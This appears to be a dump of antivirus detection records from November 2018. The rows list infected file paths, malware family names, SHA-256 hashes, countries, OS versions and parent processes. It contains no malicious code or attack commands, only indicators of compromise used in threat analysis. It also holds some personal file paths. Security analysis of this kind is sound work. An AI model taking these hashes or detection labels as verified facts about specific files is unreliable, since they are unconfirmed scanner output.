  Row(detection=Row(filename='avscan-20181102-055301-876bbfc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055301-876BBFC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053908-9682d85b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053908-9682D85B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054115-e25a6520', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054115-E25A6520', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060649-74be4843', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060649-74BE4843', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051308-f4b40d01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051308-F4B40D01', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054324-2f0cd9af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054324-2F0CD9AF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050848-59f0d311', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050848-59F0D311', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062417-e596d770', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062417-E596D770', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052526-acc11fa9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052526-ACC11FA9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050856-5ea931e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050856-5EA931E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051747-9b5709a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051747-9B5709A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062244-ae3e5c7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062244-AE3E5C7F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='C:\\Program Files (x86)\\ASUS\\AI Suite II\\ASUS Update\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='889f3913186ad848c1d0fa352980995ccb7931c21935928e7efb390d916ee905', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:11:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062209-98e55f2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062209-98E55F2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054925-066baba4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054925-066BABA4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051131-bb43a762', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051131-BB43A762', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050810-430f4e98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050810-430F4E98', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051703-8104d640', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051703-8104D640', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:07:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062453-fb318455', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062453-FB318455', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:48:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051455-34f77896', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051455-34F77896', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:48:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051209-d19c125d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051209-D19C125D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062340-cf900a55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062340-CF900A55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T03:55:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='proposal lpa.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\LPA\\PROPOSAL LPA\\PROPOSAL LPA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='rtp', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1609728, timestamp='2018-11-01T17:27:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160111-f6367e62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160111-F6367E62', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:11:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\Program Files\\Counter-Strike Xtreme V6\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='0d035a2cb0ae8a93bea6cffe9e2e40335f511afb26f966336f217661055274a5', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T03:26:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T19:58:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='absensi.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\FD\\New Folder\\fd\\GF INDONESIA\\ABSENSI\\ABSENSI.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sentineldrv32support.exe', filepath='C:\\Program Files\\Common Files\\SafeNet Sentinel\\Sentinel System Driver\\SentinelDrv32Support.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='3c3fa414cc0379e2ebe2f84e4cfec87c7fb0aadb4134ecb09ac91ea9bf937926', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Yp\\\\\\/eHlq3n0eDGW+z.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=116928, timestamp='2018-11-01T08:09:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hru9ocxci2uzu.dll', filepath='\\?\\C:\\Windows\\HrU9ocxCI2UzU.dll', filesize=192000, name='Adware/ELEX.xjuch.#M1.#R1'), hash='50450cd74f7e00ab23864f3a22f66217446dc76563594c16209c7d84999ca55d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:02:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dccw.exe', filepath='\\\\?\\C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='49193d4bc4b9c36d7276bbc3a7c76021644443d2de535350c021afbd38e41c30', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154823-74c45b4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154823-74C45B4A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='offcln.exe', filepath='E:\\Backup 03-04-2018\\MS Office 2003\\Microsoft office 2003\\FILES\\PFILES\\MSOFFICE\\OFFICE11\\OFFCLN.EXE', filesize=64000, name='TR/Patched.Gen.#M300.#R3369'), hash='28dc12c63f1c9bc70e7fc0730a8e927a4be8740147f4f40a34eb5e2f3db5fa65', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:+mgVi1otx0uMv3lM.1', country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T04:30:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nexustk.exe_25c88ee8d81e408c9fb88c09c1e79577.exe', filepath='C:\\Windows\\Installer\\{4D6DE8B6-B0A0-4F2C-BEBE-1FA024E7B951}\\NexusTK.exe_25C88EE8D81E408C9FB88C09C1E79577.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='47bca412c73d6068cf5373d9c2447a99619a7da7c632c9270b9a050af6595930', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T03:49:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T18:32:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155927-e4b856d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155927-E4B856D0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1677b5dc4ce578fefca6de41d259ec5a667843a5e36bbf2dbd5f5acc634f2497', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\1677B5DC4CE578FEFCA6DE41D259EC5A667843A5E36BBF2DBD5F5ACC634F2497', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1677b5dc4ce578fefca6de41d259ec5a667843a5e36bbf2dbd5f5acc634f2497', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:13:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160118-f74994fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160118-F74994FC', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pmc01000.exe', filepath='C:\\NOVA PASTA\\MCPED10\\PMC01000.EXE', filesize=8192000, name='W32/Sality.AT.#M1.#R1'), hash='380182af6edc88fb2739fc56adc81b54ee8cc5c35c623785e12f6816c076014f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:36:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='besar.bat', filepath='D:\\DATA_SHARE\\GAJI\\2017\\SEPTEMBER\\BUKU BESAR\\BESAR.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='combination_fac_fa60_a520fxxu3aql1_pakfirmware.com.scr', filepath='D:\\DATA_SHARE\\dini\\FILE\\COMBINATION_FAC_FA60_A520FXXU3AQL1_PakFirmware.com\\COMBINATION_FAC_FA60_A520FXXU3AQL1_PakFirmware.com.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloader-fuer-textscan_.exe', filepath='H:\\Restmüll 4\\Downloads\\Downloader-fuer-textscan_.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='76b9bd2286dc9573366783f5fe7d8d181484d5b3c98a61203f6515498a6efb9c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T19:55:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000e76b', filepath='C:\\Windows\\Temp\\tmp00007606\\tmp0000e76b', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='717cf1ef3efd0a87e5088c1cdef692880ccaab44e7361f419c074ab2bd81b733', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T15:59:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123347-e9e55ea3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123325-D7AC8A97\\AVSCAN-20181101-123347-E9E55EA3', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T15:39:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsl37E4.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:33:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112124-49816f21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112124-49816F21', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:09Z'), dt=datetime.date(2018, 11, 1)),
